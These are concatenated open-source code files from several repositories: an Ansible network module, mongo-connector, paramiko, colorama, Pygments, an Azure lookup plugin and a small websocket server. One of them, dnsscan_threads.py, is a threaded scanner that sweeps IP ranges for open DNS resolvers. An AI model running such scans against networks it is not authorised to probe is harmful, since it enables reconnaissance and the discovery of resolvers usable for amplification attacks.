elif self.type=='bond-slave':
cmd=self.modify_connection_bond_slave()
elif self.type=='ethernet':
cmd=self.modify_connection_ethernet()
elif self.type=='bridge':
cmd=self.modify_connection_bridge()
elif self.type=='vlan':
cmd=self.modify_connection_vlan()
return self.execute_command(cmd)
def main():
# Parsing argument file
module=AnsibleModule(
argument_spec=dict(
autoconnect=dict(required=False, default=None, type='bool'),
state=dict(required=True, choices=['present', 'absent'], type='str'),
conn_name=dict(required=True, type='str'),
master=dict(required=False, default=None, type='str'),
ifname=dict(required=False, default=None, type='str'),
type=dict(required=False, default=None, choices=['ethernet', 'team', 'team-slave', 'bond', 'bond-slave', 'bridge', 'vlan'], type='str'),
ip4=dict(required=False, default=None, type='str'),
gw4=dict(required=False, default=None, type='str'),
dns4=dict(required=False, default=None, type='str'),
ip6=dict(required=False, default=None, type='str'),
gw6=dict(required=False, default=None, type='str'),
dns6=dict(required=False, default=None, type='str'),
# Bond Specific vars
mode=dict(require=False, default="balance-rr", type='str', choices=["balance-rr", "active-backup", "balance-xor", "broadcast", "802.3ad",
"balance-tlb", "balance-alb"]),
miimon=dict(required=False, default=None, type='str'),
downdelay=dict(required=False, default=None, type='str'),
updelay=dict(required=False, default=None, type='str'),
arp_interval=dict(required=False, default=None, type='str'),
arp_ip_target=dict(required=False, default=None, type='str'),
# general usage
mtu=dict(required=False, default=None, type='str'),
mac=dict(required=False, default=None, type='str'),
# bridge specific vars
stp=dict(required=False, default=True, type='bool'),
priority=dict(required=False, default="128", type='str'),
slavepriority=dict(required=False, default="32", type='str'),
forwarddelay=dict(required=False, default="15", type='str'),
hellotime=dict(required=False, default="2", type='str'),
maxage=dict(required=False, default="20", type='str'),
ageingtime=dict(required=False, default="300", type='str'),
# vlan specific vars
vlanid=dict(required=False, default=None, type='str'),
vlandev=dict(required=False, default=None, type='str'),
flags=dict(required=False, default=None, type='str'),
ingress=dict(required=False, default=None, type='str'),
egress=dict(required=False, default=None, type='str'),
),
supports_check_mode=True
)
if not HAVE_DBUS:
module.fail_json(msg="This module requires dbus python bindings")
if not HAVE_NM_CLIENT:
module.fail_json(msg="This module requires NetworkManager glib API")
nmcli=Nmcli(module)
rc=None
out=''
err=''
result={}
result['conn_name']=nmcli.conn_name
result['state']=nmcli.state
# check for issues
if nmcli.conn_name is None:
nmcli.module.fail_json(msg="You haven't specified a name for the connection")
# team-slave checks
if nmcli.type=='team-slave' and nmcli.master is None:
nmcli.module.fail_json(msg="You haven't specified a name for the master so we're not changing a thing")
if nmcli.type=='team-slave' and nmcli.ifname is None:
nmcli.module.fail_json(msg="You haven't specified a name for the connection")
if nmcli.state=='absent':
if nmcli.connection_exists():
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err)=nmcli.down_connection()
(rc, out, err)=nmcli.remove_connection()
if rc!=0:
module.fail_json(name =('No Connection named %s exists' % nmcli.conn_name), msg=err, rc=rc)
elif nmcli.state=='present':
if nmcli.connection_exists():
# modify connection (note: this function is check mode aware)
# result['Connection']=('Connection %s of Type %s is not being added' % (nmcli.conn_name, nmcli.type))
result['Exists']='Connections do exist so we are modifying them'
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err)=nmcli.modify_connection()
if not nmcli.connection_exists():
result['Connection']=('Connection %s of Type %s is being added' % (nmcli.conn_name, nmcli.type))
if module.check_mode:
module.exit_json(changed=True)
(rc, out, err)=nmcli.create_connection()
if rc is not None and rc!=0:
module.fail_json(name=nmcli.conn_name, msg=err, rc=rc)
if rc is None:
result['changed']=False
else:
result['changed']=True
if out:
result['stdout']=out
if err:
result['stderr']=err
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
vietanh85/mongo-connector
|
mongo_connector/doc_managers/doc_manager_base.py
|
33
|
5701
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from mongo_connector.compat import reraise
from mongo_connector.errors import UpdateDoesNotApply
class DocManagerBase(object):
"""Base class for all DocManager implementations."""
def apply_update(self, doc, update_spec):
"""Apply an update operation to a document."""
# Helper to cast a key for a list or dict, or raise ValueError
def _convert_or_raise(container, key):
if isinstance(container, dict):
return key
elif isinstance(container, list):
return int(key)
else:
raise ValueError
# Helper to retrieve (and/or create)
# a dot-separated path within a document.
def _retrieve_path(container, path, create=False):
looking_at = container
for part in path:
if isinstance(looking_at, dict):
if create and not part in looking_at:
looking_at[part] = {}
looking_at = looking_at[part]
elif isinstance(looking_at, list):
index = int(part)
# Do we need to create additional space in the array?
if create and len(looking_at) <= index:
# Fill buckets with None up to the index we need.
looking_at.extend(
[None] * (index - len(looking_at)))
# Bucket we need gets the empty dictionary.
looking_at.append({})
looking_at = looking_at[index]
else:
raise ValueError
return looking_at
# wholesale document replacement
if not "$set" in update_spec and not "$unset" in update_spec:
# update spec contains the new document in its entirety
return update_spec
else:
try:
# $set
for to_set in update_spec.get("$set", []):
value = update_spec['$set'][to_set]
if '.' in to_set:
path = to_set.split(".")
where = _retrieve_path(doc, path[:-1], create=True)
wl = len(where)
index = _convert_or_raise(where, path[-1])
if isinstance(where, list) and index >= wl:
where.extend([None] * (index + 1 - wl))
where[index] = value
else:
doc[to_set] = value
# $unset
for to_unset in update_spec.get("$unset", []):
if '.' in to_unset:
path = to_unset.split(".")
where = _retrieve_path(doc, path[:-1])
where.pop(_convert_or_raise(where, path[-1]))
else:
doc.pop(to_unset)
except (KeyError, ValueError, AttributeError, IndexError):
exc_t, exc_v, exc_tb = sys.exc_info()
reraise(UpdateDoesNotApply,
"Cannot apply update %r to %r" % (update_spec, doc),
exc_tb)
return doc
def bulk_upsert(self, docs, namespace, timestamp):
"""Upsert each document in a set of documents.
This method may be overridden to upsert many documents at once.
"""
for doc in docs:
self.upsert(doc, namespace, timestamp)
def update(self, doc, update_spec, namespace, timestamp):
"""Update a document.
``update_spec`` is the update operation as provided by an oplog record
in the "o" field.
"""
raise NotImplementedError
def upsert(self, document, namespace, timestamp):
"""(Re-)insert a document."""
raise NotImplementedError
def remove(self, document_id, namespace, timestamp):
"""Remove a document.
``document_id`` is a dict that provides the id of the document
to be removed. ``namespace`` and ``timestamp`` provide the database +
collection name and the timestamp from the corresponding oplog entry.
"""
raise NotImplementedError
def insert_file(self, f, namespace, timestamp):
"""Insert a file from GridFS."""
raise NotImplementedError
def handle_command(self, command_doc, namespace, timestamp):
"""Handle a MongoDB command."""
raise NotImplementedError
def search(self, start_ts, end_ts):
"""Get an iterable of documents that were inserted, updated, or deleted
between ``start_ts`` and ``end_ts``.
"""
raise NotImplementedError
def commit(self):
"""Commit all outstanding writes."""
raise NotImplementedError
def get_last_doc(self):
"""Get the document that was modified or deleted most recently."""
raise NotImplementedError
def stop(self):
"""Stop all threads started by this DocManager."""
raise NotImplementedError
|
apache-2.0
|
tghw/gotr-bowl
|
libs/paramiko/dsskey.py
|
7
|
6726
|
# Copyright (C) 2003-2007 Robey Pointer <[email protected]>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
L{DSSKey}
"""
from Crypto.PublicKey import DSA
from Crypto.Hash import SHA
from paramiko.common import *
from paramiko import util
from paramiko.ssh_exception import SSHException
from paramiko.message import Message
from paramiko.ber import BER, BERException
from paramiko.pkey import PKey
class DSSKey (PKey):
"""
Representation of a DSS key which can be used to sign an verify SSH2
data.
"""
def __init__(self, msg=None, data=None, filename=None, password=None, vals=None, file_obj=None):
self.p = None
self.q = None
self.g = None
self.y = None
self.x = None
if file_obj is not None:
self._from_private_key(file_obj, password)
return
if filename is not None:
self._from_private_key_file(filename, password)
return
if (msg is None) and (data is not None):
msg = Message(data)
if vals is not None:
self.p, self.q, self.g, self.y = vals
else:
if msg is None:
raise SSHException('Key object may not be empty')
if msg.get_string() != 'ssh-dss':
raise SSHException('Invalid key')
self.p = msg.get_mpint()
self.q = msg.get_mpint()
self.g = msg.get_mpint()
self.y = msg.get_mpint()
self.size = util.bit_length(self.p)
def __str__(self):
m = Message()
m.add_string('ssh-dss')
m.add_mpint(self.p)
m.add_mpint(self.q)
m.add_mpint(self.g)
m.add_mpint(self.y)
return str(m)
def __hash__(self):
h = hash(self.get_name())
h = h * 37 + hash(self.p)
h = h * 37 + hash(self.q)
h = h * 37 + hash(self.g)
h = h * 37 + hash(self.y)
# h might be a long by now...
return hash(h)
def get_name(self):
return 'ssh-dss'
def get_bits(self):
return self.size
def can_sign(self):
return self.x is not None
def sign_ssh_data(self, rng, data):
digest = SHA.new(data).digest()
dss = DSA.construct((long(self.y), long(self.g), long(self.p), long(self.q), long(self.x)))
# generate a suitable k
qsize = len(util.deflate_long(self.q, 0))
while True:
k = util.inflate_long(rng.read(qsize), 1)
if (k > 2) and (k < self.q):
break
r, s = dss.sign(util.inflate_long(digest, 1), k)
m = Message()
m.add_string('ssh-dss')
# apparently, in rare cases, r or s may be shorter than 20 bytes!
rstr = util.deflate_long(r, 0)
sstr = util.deflate_long(s, 0)
if len(rstr) < 20:
rstr = '\x00' * (20 - len(rstr)) + rstr
if len(sstr) < 20:
sstr = '\x00' * (20 - len(sstr)) + sstr
m.add_string(rstr + sstr)
return m
def verify_ssh_sig(self, data, msg):
if len(str(msg)) == 40:
# spies.com bug: signature has no header
sig = str(msg)
else:
kind = msg.get_string()
if kind != 'ssh-dss':
return 0
sig = msg.get_string()
# pull out (r, s) which are NOT encoded as mpints
sigR = util.inflate_long(sig[:20], 1)
sigS = util.inflate_long(sig[20:], 1)
sigM = util.inflate_long(SHA.new(data).digest(), 1)
dss = DSA.construct((long(self.y), long(self.g), long(self.p), long(self.q)))
return dss.verify(sigM, (sigR, sigS))
def _encode_key(self):
if self.x is None:
raise SSHException('Not enough key information')
keylist = [ 0, self.p, self.q, self.g, self.y, self.x ]
try:
b = BER()
b.encode(keylist)
except BERException:
raise SSHException('Unable to create ber encoding of key')
return str(b)
def write_private_key_file(self, filename, password=None):
self._write_private_key_file('DSA', filename, self._encode_key(), password)
def write_private_key(self, file_obj, password=None):
self._write_private_key('DSA', file_obj, self._encode_key(), password)
def generate(bits=1024, progress_func=None):
"""
Generate a new private DSS key. This factory function can be used to
generate a new host key or authentication key.
@param bits: number of bits the generated key should be.
@type bits: int
@param progress_func: an optional function to call at key points in
key generation (used by C{pyCrypto.PublicKey}).
@type progress_func: function
@return: new private key
@rtype: L{DSSKey}
"""
dsa = DSA.generate(bits, rng.read, progress_func)
key = DSSKey(vals=(dsa.p, dsa.q, dsa.g, dsa.y))
key.x = dsa.x
return key
generate = staticmethod(generate)
### internals...
def _from_private_key_file(self, filename, password):
data = self._read_private_key_file('DSA', filename, password)
self._decode_key(data)
def _from_private_key(self, file_obj, password):
data = self._read_private_key('DSA', file_obj, password)
self._decode_key(data)
def _decode_key(self, data):
# private key file contains:
# DSAPrivateKey = { version = 0, p, q, g, y, x }
try:
keylist = BER(data).decode()
except BERException, x:
raise SSHException('Unable to parse key file: ' + str(x))
if (type(keylist) is not list) or (len(keylist) < 6) or (keylist[0] != 0):
raise SSHException('not a valid DSA private key file (bad ber encoding)')
self.p = keylist[1]
self.q = keylist[2]
self.g = keylist[3]
self.y = keylist[4]
self.x = keylist[5]
self.size = util.bit_length(self.p)
|
bsd-3-clause
|
RGreinacher/AmbiGrid
|
system/networkInterface.py
|
1
|
5800
|
#!/usr/local/bin/python3.4
# -*- coding: utf-8 -*-
# Read the README.md for a basic understanding of the server API.
# import python libs
import json
import asyncio
import socket
from autobahn.asyncio.websocket import WebSocketServerProtocol
from autobahn.asyncio.websocket import WebSocketServerFactory
# import project libs
import config
from issetHelper import IssetHelper
from colorController import ColorController
# This is a autobahn based web socket protocol for the AmbiGrid API.
# Read the README.md file to get an understanding of the API
class WebSocketProtocol(WebSocketServerProtocol, IssetHelper):
def onOpen(self):
if self.beVerbose: print('WebSocket connection open.')
def onConnect(self, request):
if self.beVerbose: print('\nClient connecting: {}'.format(request.peer))
self.animationController.setWebSocketHandler(self)
def onClose(self, wasClean, code, reason):
if self.beVerbose: print('\nWebSocket connection closed: {}'.format(reason))
self.animationController.unsetWebSocketHandler(self)
def onMessage(self, payload, isBinary):
if isBinary:
return
stringMessage = payload.decode('utf8')
response = {}
try:
jsonMessage = json.loads(stringMessage)
response = self.processRequest(jsonMessage)
except ValueError:
response = self.statusRequest()
self.sendDictionary(response)
def sendDictionary(self, dictionary):
responsAsJsonString = json.dumps(dictionary, ensure_ascii=False)
self.sendMessage(responsAsJsonString.encode('utf8'))
def setReferences(self, bridge, animationController, verbose):
self.bridge = bridge
self.animationController = animationController
self.colors = ColorController
self.beVerbose = verbose
def processRequest(self, requestData):
response = {}
if requestData['action'] == 'setAnimation':
self.setAnimationRequest(requestData)
elif requestData['action'] == 'setFadeOut':
self.setFadeOutRequest(requestData)
elif requestData['action'] == 'stopFadeOut':
self.stopFadeOutRequest()
elif requestData['action'] == 'setBaseColor':
self.setColorRequest(requestData)
response = self.statusRequest(requestData)
return response
def statusRequest(self, requestData = None):
if (self.isset(requestData, 'details') and
requestData['details'] == True):
return self.animationController.getAllStati()
else:
return self.animationController.getStatus()
def setAnimationRequest(self, requestData):
if self.isset(requestData, 'name'):
self.animationController.showAnimation(requestData)
def setFadeOutRequest(self, requestData):
time = self.saveIntConvert(requestData['seconds'])
if time > 0:
self.animationController.setFadeOut(time)
def stopFadeOutRequest(self):
self.animationController.stopFadeOut()
def setColorRequest(self, requestData):
colorType = requestData['type']
if colorType == 'hex' and self.isInt(requestData['value'], 16):
return self.colors.setBasisColorAsHex(int(requestData['value'], 16))
elif colorType == 'rgb':
return self.setRgbColorRequest(requestData)
elif colorType == 'hsl':
return self.setHslColorRequest(requestData)
def setRgbColorRequest(self, requestData):
try:
redValue = int(requestData['red'])
greenValue = int(requestData['green'])
blueValue = int(requestData['blue'])
except (ValueError, TypeError):
return
if (redValue >= 0 and redValue <= 255 and
greenValue >= 0 and greenValue <= 255 and
blueValue >= 0 and blueValue <= 255):
self.colors.setBasisColorAsRgb(redValue, greenValue, blueValue)
def setHslColorRequest(self, requestData):
try:
hue = float(requestData['hue'])
saturation = float(requestData['saturation'])
lightness = float(requestData['lightness'])
except (ValueError, TypeError):
return
if (hue >= 0 and hue <= 1 and
saturation >= 0 and saturation <= 1 and
lightness >= 0 and lightness <= 1):
self.colors.setBasisColorAsHsl(hue, saturation, lightness)
class AmbiGridNetworking():
def __init__(self, wsPort, lightAnimationController, verbose = False):
# initializations
self.port = wsPort
self.animationController = lightAnimationController
self.beVerbose = verbose
# prepare the web socket protocol
webSocketProtocol = WebSocketProtocol
webSocketProtocol.setReferences(
webSocketProtocol, self, self.animationController, self.beVerbose)
# prepare the web sockets
factory = WebSocketServerFactory()
factory.protocol = webSocketProtocol
# get the host's IP
if config.AUTO_DETECT_HOST_IP:
host = socket.gethostbyname(socket.gethostname())
else:
host = config.HOST_IP
# start the server event loop
loop = asyncio.get_event_loop()
coro = loop.create_server(factory, host, self.port)
wsServer = loop.run_until_complete(coro)
try:
if self.beVerbose:
serverAddressString = host + ':' + str(self.port)
print('WS sever: launched at', serverAddressString)
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
wsServer.close()
loop.close()
|
mit
|
IT-Department-Projects/OOAD-Project
|
Flask_App/oakcrest/lib/python2.7/site-packages/pip/_vendor/colorama/winterm.py
|
578
|
6290
|
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file.
from . import win32
# from wincon.h
class WinColor(object):
BLACK = 0
BLUE = 1
GREEN = 2
CYAN = 3
RED = 4
MAGENTA = 5
YELLOW = 6
GREY = 7
# from wincon.h
class WinStyle(object):
NORMAL = 0x00 # dim text, dim background
BRIGHT = 0x08 # bright text, dim background
BRIGHT_BACKGROUND = 0x80 # dim text, bright background
class WinTerm(object):
def __init__(self):
self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes
self.set_attrs(self._default)
self._default_fore = self._fore
self._default_back = self._back
self._default_style = self._style
# In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style.
# So that LIGHT_EX colors and BRIGHT style do not clobber each other,
# we track them separately, since LIGHT_EX is overwritten by Fore/Back
# and BRIGHT is overwritten by Style codes.
self._light = 0
def get_attrs(self):
return self._fore + self._back * 16 + (self._style | self._light)
def set_attrs(self, value):
self._fore = value & 7
self._back = (value >> 4) & 7
self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND)
def reset_all(self, on_stderr=None):
self.set_attrs(self._default)
self.set_console(attrs=self._default)
def fore(self, fore=None, light=False, on_stderr=False):
if fore is None:
fore = self._default_fore
self._fore = fore
# Emulate LIGHT_EX with BRIGHT Style
if light:
self._light |= WinStyle.BRIGHT
else:
self._light &= ~WinStyle.BRIGHT
self.set_console(on_stderr=on_stderr)
def back(self, back=None, light=False, on_stderr=False):
if back is None:
back = self._default_back
self._back = back
# Emulate LIGHT_EX with BRIGHT_BACKGROUND Style
if light:
self._light |= WinStyle.BRIGHT_BACKGROUND
else:
self._light &= ~WinStyle.BRIGHT_BACKGROUND
self.set_console(on_stderr=on_stderr)
def style(self, style=None, on_stderr=False):
if style is None:
style = self._default_style
self._style = style
self.set_console(on_stderr=on_stderr)
def set_console(self, attrs=None, on_stderr=False):
if attrs is None:
attrs = self.get_attrs()
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleTextAttribute(handle, attrs)
def get_position(self, handle):
position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition
# Because Windows coordinates are 0-based,
# and win32.SetConsoleCursorPosition expects 1-based.
position.X += 1
position.Y += 1
return position
def set_cursor_position(self, position=None, on_stderr=False):
if position is None:
# I'm not currently tracking the position, so there is no default.
# position = self.get_position()
return
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
win32.SetConsoleCursorPosition(handle, position)
def cursor_adjust(self, x, y, on_stderr=False):
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
position = self.get_position(handle)
adjusted_position = (position.Y + y, position.X + x)
win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False)
def erase_screen(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the screen.
# 1 should clear from the cursor to the beginning of the screen.
# 2 should clear the entire screen, and move cursor to (1,1)
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
# get the number of character cells in the current buffer
cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y
# get number of character cells before current cursor position
cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = cells_in_screen - cells_before_cursor
if mode == 1:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_before_cursor
elif mode == 2:
from_coord = win32.COORD(0, 0)
cells_to_erase = cells_in_screen
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
if mode == 2:
# put the cursor where needed
win32.SetConsoleCursorPosition(handle, (1, 1))
def erase_line(self, mode=0, on_stderr=False):
# 0 should clear from the cursor to the end of the line.
# 1 should clear from the cursor to the beginning of the line.
# 2 should clear the entire line.
handle = win32.STDOUT
if on_stderr:
handle = win32.STDERR
csbi = win32.GetConsoleScreenBufferInfo(handle)
if mode == 0:
from_coord = csbi.dwCursorPosition
cells_to_erase = csbi.dwSize.X - csbi.dwCursorPosition.X
if mode == 1:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwCursorPosition.X
elif mode == 2:
from_coord = win32.COORD(0, csbi.dwCursorPosition.Y)
cells_to_erase = csbi.dwSize.X
# fill the entire screen with blanks
win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord)
# now set the buffer's attributes accordingly
win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord)
def set_title(self, title):
win32.SetConsoleTitle(title)
|
mit
|
jpverkamp/dnsscan
|
dnsscan_threads.py
|
1
|
2216
|
#!/usr/bin/env python
import os
import sys
import dns.resolver
import Queue
import time
import threading
# Various settings
numthreads = 150
resultList = []
wq = Queue.Queue()
# Prefix to yield
def prefix_to_ips(prefix):
if '/' in prefix:
ip, size = prefix.split('/')
else:
ip = prefix
size = 32
ip = map(int, ip.split('.'))
size = 2 ** (32 - int(size))
for i in xrange(size):
yield '.'.join(map(str, ip))
ip[3] += 1
for i in xrange(3, 0, -1):
if ip[i] > 255:
ip[i] = 0
ip[i - 1] += 1
# Thread Launcher
def launchThreads(prefix,numthreads):
global wq
# Enqueing Stuff
for ip in prefix_to_ips(prefix):
wq.put(ip)
# Spawning Threads
for i in range(numthreads):
t = threading.Thread(target=tRun)
t.start()
while threading.active_count() > 1:
time.sleep(0.1)
# Thread
def tRun():
global wq
global resultList
while not wq.empty():
ip = wq.get()
resolver = dns.resolver.Resolver()
resolver.nameservers = [ip]
resolver.lifetime = 0.15
target = 'google.com'
try:
answers = resolver.query(target, 'A')
resultList.append('%s' % (ip))
# If no response do nothing
except (dns.resolver.NoAnswer, dns.resolver.NoNameservers), ex:
pass
# If timeout do nothing
except dns.resolver.Timeout, ex:
pass
# If something else went sideways do nothing
except:
pass
if __name__ == '__main__':
# Process command line options
import argparse
parser = argparse.ArgumentParser(description = 'Scan prefixes for open resolvers')
parser.add_argument('prefixes', nargs = argparse.REMAINDER, help = 'prefixes to scan')
args = parser.parse_args()
# Run scans, die properly on CTRL-C
try:
for prefix in args.prefixes:
launchThreads(prefix,numthreads)
# Print results
for x in resultList:
print x
print "Number of open resolvers: %s" %(len(resultList))
except KeyboardInterrupt, ex:
pass
|
mit
|
joshimio/blog
|
node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/formatters/svg.py
|
362
|
5867
|
# -*- coding: utf-8 -*-
"""
pygments.formatters.svg
~~~~~~~~~~~~~~~~~~~~~~~
Formatter for SVG output.
:copyright: Copyright 2006-2013 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.formatter import Formatter
from pygments.util import get_bool_opt, get_int_opt
__all__ = ['SvgFormatter']
def escape_html(text):
"""Escape &, <, > as well as single and double quotes for HTML."""
return text.replace('&', '&'). \
replace('<', '<'). \
replace('>', '>'). \
replace('"', '"'). \
replace("'", ''')
class2style = {}
class SvgFormatter(Formatter):
"""
Format tokens as an SVG graphics file. This formatter is still experimental.
Each line of code is a ``<text>`` element with explicit ``x`` and ``y``
coordinates containing ``<tspan>`` elements with the individual token styles.
By default, this formatter outputs a full SVG document including doctype
declaration and the ``<svg>`` root element.
*New in Pygments 0.9.*
Additional options accepted:
`nowrap`
Don't wrap the SVG ``<text>`` elements in ``<svg><g>`` elements and
don't add a XML declaration and a doctype. If true, the `fontfamily`
and `fontsize` options are ignored. Defaults to ``False``.
`fontfamily`
The value to give the wrapping ``<g>`` element's ``font-family``
attribute, defaults to ``"monospace"``.
`fontsize`
The value to give the wrapping ``<g>`` element's ``font-size``
attribute, defaults to ``"14px"``.
`xoffset`
Starting offset in X direction, defaults to ``0``.
`yoffset`
Starting offset in Y direction, defaults to the font size if it is given
in pixels, or ``20`` else. (This is necessary since text coordinates
refer to the text baseline, not the top edge.)
`ystep`
Offset to add to the Y coordinate for each subsequent line. This should
roughly be the text size plus 5. It defaults to that value if the text
size is given in pixels, or ``25`` else.
`spacehack`
Convert spaces in the source to `` ``, which are non-breaking
spaces. SVG provides the ``xml:space`` attribute to control how
whitespace inside tags is handled, in theory, the ``preserve`` value
could be used to keep all whitespace as-is. However, many current SVG
viewers don't obey that rule, so this option is provided as a workaround
and defaults to ``True``.
"""
name = 'SVG'
aliases = ['svg']
filenames = ['*.svg']
def __init__(self, **options):
# XXX outencoding
Formatter.__init__(self, **options)
self.nowrap = get_bool_opt(options, 'nowrap', False)
self.fontfamily = options.get('fontfamily', 'monospace')
self.fontsize = options.get('fontsize', '14px')
self.xoffset = get_int_opt(options, 'xoffset', 0)
fs = self.fontsize.strip()
if fs.endswith('px'): fs = fs[:-2].strip()
try:
int_fs = int(fs)
except:
int_fs = 20
self.yoffset = get_int_opt(options, 'yoffset', int_fs)
self.ystep = get_int_opt(options, 'ystep', int_fs + 5)
self.spacehack = get_bool_opt(options, 'spacehack', True)
self._stylecache = {}
def format_unencoded(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
For our implementation we put all lines in their own 'line group'.
"""
x = self.xoffset
y = self.yoffset
if not self.nowrap:
if self.encoding:
outfile.write('<?xml version="1.0" encoding="%s"?>\n' %
self.encoding)
else:
outfile.write('<?xml version="1.0"?>\n')
outfile.write('<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" '
'"http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/'
'svg10.dtd">\n')
outfile.write('<svg xmlns="http://www.w3.org/2000/svg">\n')
outfile.write('<g font-family="%s" font-size="%s">\n' %
(self.fontfamily, self.fontsize))
outfile.write('<text x="%s" y="%s" xml:space="preserve">' % (x, y))
for ttype, value in tokensource:
style = self._get_style(ttype)
tspan = style and '<tspan' + style + '>' or ''
tspanend = tspan and '</tspan>' or ''
value = escape_html(value)
if self.spacehack:
value = value.expandtabs().replace(' ', ' ')
parts = value.split('\n')
for part in parts[:-1]:
outfile.write(tspan + part + tspanend)
y += self.ystep
outfile.write('</text>\n<text x="%s" y="%s" '
'xml:space="preserve">' % (x, y))
outfile.write(tspan + parts[-1] + tspanend)
outfile.write('</text>')
if not self.nowrap:
outfile.write('</g></svg>\n')
def _get_style(self, tokentype):
if tokentype in self._stylecache:
return self._stylecache[tokentype]
otokentype = tokentype
while not self.style.styles_token(tokentype):
tokentype = tokentype.parent
value = self.style.style_for_token(tokentype)
result = ''
if value['color']:
result = ' fill="#' + value['color'] + '"'
if value['bold']:
result += ' font-weight="bold"'
if value['italic']:
result += ' font-style="italic"'
self._stylecache[otokentype] = result
return result
|
mit
|
onitake/ansible
|
test/integration/targets/azure_rm_keyvault/lookup_plugins/azure_service_principal_attribute.py
|
84
|
3519
|
# (c) 2018 Yunge Zhu, <[email protected]>
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
lookup: azure_service_principal_attribute
requirements:
- azure-graphrbac
author:
- Yunge Zhu <[email protected]>
version_added: "2.7"
short_description: Look up Azure service principal attributes.
description:
- Describes object id of your Azure service principal account.
options:
azure_client_id:
description: azure service principal client id.
azure_secret:
description: azure service principal secret
azure_tenant:
description: azure tenant
azure_cloud_environment:
description: azure cloud environment
"""
EXAMPLES = """
set_fact:
object_id: "{{ lookup('azure_service_principal_attribute',
azure_client_id=azure_client_id,
azure_secret=azure_secret,
azure_tenant=azure_secret) }}"
"""
RETURN = """
_raw:
description:
Returns object id of service principal.
"""
from ansible.errors import AnsibleError
from ansible.plugins import AnsiblePlugin
from ansible.plugins.lookup import LookupBase
from ansible.module_utils._text import to_native
try:
from azure.common.credentials import ServicePrincipalCredentials
from azure.graphrbac import GraphRbacManagementClient
from msrestazure import azure_cloud
from msrestazure.azure_exceptions import CloudError
except ImportError:
raise AnsibleError(
"The lookup azure_service_principal_attribute requires azure.graphrbac, msrest")
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
self.set_options(direct=kwargs)
credentials = {}
credentials['azure_client_id'] = self.get_option('azure_client_id', None)
credentials['azure_secret'] = self.get_option('azure_secret', None)
credentials['azure_tenant'] = self.get_option('azure_tenant', 'common')
if credentials['azure_client_id'] is None or credentials['azure_secret'] is None:
raise AnsibleError("Must specify azure_client_id and azure_secret")
_cloud_environment = azure_cloud.AZURE_PUBLIC_CLOUD
if self.get_option('azure_cloud_environment', None) is not None:
cloud_environment = azure_cloud.get_cloud_from_metadata_endpoint(credentials['azure_cloud_environment'])
try:
azure_credentials = ServicePrincipalCredentials(client_id=credentials['azure_client_id'],
secret=credentials['azure_secret'],
tenant=credentials['azure_tenant'],
resource=_cloud_environment.endpoints.active_directory_graph_resource_id)
client = GraphRbacManagementClient(azure_credentials, credentials['azure_tenant'],
base_url=_cloud_environment.endpoints.active_directory_graph_resource_id)
response = list(client.service_principals.list(filter="appId eq '{0}'".format(credentials['azure_client_id'])))
sp = response[0]
return sp.object_id.split(',')
except CloudError as ex:
raise AnsibleError("Failed to get service principal object id: %s" % to_native(ex))
return False
|
gpl-3.0
|
Teamxrtc/webrtc-streaming-node
|
third_party/webrtc/src/chromium/src/build/android/gyp/pack_relocations.py
|
34
|
3683
|
#!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
